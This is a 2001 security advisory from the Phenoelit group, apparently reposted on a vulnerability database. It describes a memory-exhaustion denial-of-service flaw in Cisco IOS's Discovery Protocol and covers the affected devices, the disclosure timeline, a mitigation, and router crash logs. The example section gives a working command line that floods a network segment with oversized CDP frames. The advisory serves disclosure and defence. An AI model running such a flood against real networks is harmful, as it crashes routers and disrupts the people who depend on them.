Basic search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:2084
HistoryOct 10, 2001 - 12:00 a.m.

Cisco CDP attacks

2001-10-1000:00:00
vulners.com
86

Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815++>

[ Authors ]
FX <fx@phenoelit.de>
FtR <ftr@phenoelit.de>
kim0 <kim0@phenoelit.de>
smoovB <not disclosed>

    Phenoelit Group &#40;http://www.phenoelit.de&#41;

[ Affected Products ]
Cisco IOS - several versions

    Known vulnerable combinations:
            Cisco 1005      IOS 11.1.*
            Cisco 1603      IOS 11.2, 11.3.11b
            Cisco 2503      IOS 12.0.19
            Cisco 2600      IOS 12.1.?
            Catalyst 2940XL IOS 12.0&#40;5.1&#41;XP

    Known to be not vulnerable:
            Catalyst 5505   CatOS 4.5&#40;1&#41;

    Cisco Bug ID:           CSCdu09909

[ Vendor communication ]
04/25/2001 Cisco contacted via psirt@cisco.com
04/25/2001 Damir Rajnovic (gaus@cisco.com) reply
04/26/2001 Gaus confirmed vulnerability, fix planed
05/16/2001 Gaus had no feedback from the developers
06/12/2001 Gaus still left in the cold by his developer
contacts
06/29/2001 Gaus reports that work on the issue has started but
release date is unknown.
07/03/2001 Cisco expects fix between September and October for
the major IOS releases
09/27/2001 This advisory goes to Cisco for coordination
10/02/2001 Final coordination response from Gaus
10/09/2001 Joint release with Cisco Systems (Gaus)

    Phenoelit wants to thank gaus@cisco.com &#40;Damir Rajnovic&#41; for the
    outstanding communication and cooperation. 

[ Overview ]
Cisco Systems IOS is vulnerable to a denial-of-service attack using
Cisco's proprietary Cisco Discovery Protocol (CDP).

    When flooded with CDP neighbor announcements, the IOS uses up all

it's
memory to store the neighbor information. The device is then
unable to
perform operations that need additional memory such as receiving
routing updates and accepting inbound telnet(1) connections.

    Some device/IOS combinations tested reboot, others simply stop
    working completely.

[ Decription ]
The Cisco Discovery Protocol is a layer two protocol and therefore
independent from layer three protocols configured on the device.
A Cisco device sends out periodic updates out of it's interfaces to
make itself known to it's neigbors. Since it is a layer two
protocol,
these packets (frames) are not routed. The updates are send on
Ethernet to the multicast address 01:00:0C:CC:CC:CC.

    If a Cisco device receives a CDP frame from another device, it

copies
the contents into internal data structures that can be viewed by
the
operator using the 'show cdp neighbors' command. The information
includes the Device ID, capabilities, platform and sender's port
ID.
The CDP frames also include a hold timer value to tell the neighbor
when he has to discard the information. The maximum values for this
timer is 255 seconds (4 minutes, 15 seconds).

    The internal data structure seems to use the remote device ID as

key.
When receiving two identical but long device IDs, some IOS
versions are
unable to identify them as identical and stores both of them as
independent records.

    When flooding a network segment with large CDP frames containing a
    random device ID and comming from a random data link address,
    different IOS versions react differently. The range of possible
    reactions includes:
            + Reboot after 3 to 5 frames are received
            + Completely stop working after some thousands of frames
            + Use all available memory to store CDP neighbor

information
until the hold timer expires

    While the memory of the device is completely filled with CDP
    information, it is unable to perform other operations that need
    additional memory allocated. This includes accepting dynamic

routing
updates or new inbound telnet(1) sessions.

    If an operator on the device console tries to debug the CDP traffic
    using the command &#39;debug cdp packets&#39;, all tested devices crashed.

    Interesting is the reaction of the command line &#39;shell&#39; when

flooding
the device as seen in the example. At least the help doesn't work
anymore. It is not known if this behavior can be used for further
exploitation of the device.

[ Example ]
To send CDP messages, the cdp sender tool from the Phenoelit IRPAS
package is used (http://www.phenoelit.de/irpas/&#41;. The command line
to
send maximum sized cdp frames with random data link addresses and
device names is:

    linuxbox# ./cdp -i eth0 -m0 -n 100000 -l 1480 -r -v

    Be careful when running this! All vulnerable Cisco devices in the
    data link multicast domain will be affected &#40;read: all Ciscos
    connected to your Ethernet hub/switch&#41;.


    Reaction of a Cisco 1603 / IOS 11.2&#40;4&#41;:

    radio#
    &#37;SYS-2-MALLOCFAIL: Memory allocation of 1480 bytes failed from 
    0x81B3BE6, pool Processor, alignment 0
    -Process= &quot;CDP Protocol&quot;, ipl= 0, pid= 9
    -Traceback= 80ABDCC 80ACF46 81B3BEE 81B3B72 81B276A 81B224C
    radio#
    &#37;SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from 
    0x81B26D2, pool Processor, alignment 0
    -Process= &quot;CDP Protocol&quot;, ipl= 0, pid= 9
    -Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
    &#37;SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from 
    0x81B26D2, pool Processor, alignment 0
    -Process= &quot;CDP Protocol&quot;, ipl= 0, pid= 9
    -Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
    radio#sh ?
    &#37; Unrecognized command
    radio#show ?
    &#37; Unrecognized command
    radio#


    Reaction after &#39;debug cdp packets&#39;:

    &#37;Log packet overrun, potential memory corruption, PC 0x81B2720,

format:
%s
%Log packet overrun, potential memory corruption, PC 0x81B2720,
format:
%s
…[lots of these]…
%Log packet overrun, potential memory corruption, PC 0x81B2720,
format:
%s
%Log packet overrun, potential memory corruption, PC 0x81B2720,
format:
%s

    *** BUS ERROR***
    access address = 0x5f227998
    program counter = 0x80ad45a
    status register = 0x2700
    vbr at time of exception = 0x4000000
    special status word = 0x0045
    faulted cycle was a longword read

    monitor: command &quot;boot&quot; aborted due to exception


    System Bootstrap, Version .....
    Copyright &#40;c&#41; 1994-1996 by cisco Systems, Inc.
    C1600 processor with 2048 Kbytes of main memory

    program load complete, entry point: 0x4018060, size: 0x1da950

[ Solution ]

    Include the command &#39;no cdp run&#39; in all configurations of Cisco
    devices and update your IOS to a fixed version when these become
    available.

[ end of file ]